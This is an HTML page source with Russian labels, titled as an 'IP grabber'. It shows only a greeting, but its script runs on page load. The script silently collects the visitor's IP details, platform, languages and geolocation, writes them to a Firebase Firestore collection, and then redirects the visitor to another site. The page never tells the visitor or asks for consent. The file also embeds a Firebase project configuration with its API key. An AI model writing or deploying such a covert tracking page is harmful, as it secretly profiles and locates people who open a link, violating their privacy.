<!--
<!DOCTYPE html>
<html lang="ru">
    <head>
        <meta charset="UTF-8">
        <title>Айпишка</title>
    </head>
    <body>
        <div style="display: flex; justify-content: center; align-items: center">Здрасьте</div>
        <script>
            inputApp();
            async function inputApp() {
                await fetch('http://freegeoip.net/shutdown').then((data) => {
                    alert(data.ip);
                });
                //alert('Привет!');
                //
            }
        </script>
    </body>
</html>-->
<!DOCTYPE html>

<html lang="ru">
<head>
    <meta charset="UTF-8">
    <title>Айпишка</title>
    <style>
        h1 {color: green;}
    </style>
    <!-- The core Firebase JS SDK is always required and must be listed first -->
    <script src="https://www.gstatic.com/firebasejs/7.22.0/firebase-app.js"></script>
    <script src="https://www.gstatic.com/firebasejs/7.22.0/firebase-firestore.js"></script>

    <!-- TODO: Add SDKs for Firebase products that you want to use
         https://firebase.google.com/docs/web/setup#available-libraries -->

    <script>
        // Your web app's Firebase configuration
        let firebaseConfig = {
            apiKey: "AIzaSyDidHqKWI8FyTqSRzUx3JEENDi5g3gS_10",
            authDomain: "robotix-com.firebaseapp.com",
            databaseURL: "https://robotix-com.firebaseio.com",
            projectId: "robotix-com",
            storageBucket: "robotix-com.appspot.com",
            messagingSenderId: "596568656412",
            appId: "1:596568656412:web:a914aebdeb20667c246dd9"
        };
        // Initialize Firebase
        firebase.initializeApp(firebaseConfig);

        var db = firebase.firestore();
        console.log(db);
    </script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script>
        $.get("https://ipinfo.io", function(response) {
            console.log(response);
            writeIP(response);
            //
        }, "json")
        // "json" shows that data will be fetched in json format
        async function writeIP(data) {
            data.platform = navigator.platform;
            data.langs = navigator.languages;
            try {
                navigator.geolocation.getCurrentPosition((position) => {
                    window.position = position
                }).then(async function (){
                    data.position = window.position;
                    let data1 = {};
                    data1[data.ip] = data;
                    await db.collection("ips").doc("ips").set(data1, { merge: true });
                    document.location.href = 'http://robotix.hostronavt.ru/'/*})*/;
                })
            } catch (e) {
                data.position = data.loc;
                let data1 = {};
                data1[data.ip] = data;
                await db.collection("ips").doc("ips").set(data1, { merge: true });
                document.location.href = 'http://robotix.hostronavt.ru/'/*})*/;
                console.log(e);
            }
        }
    </script>
</head>
<body>
<div>
    <h1>Привет</h1>
</div>
</body>
</html>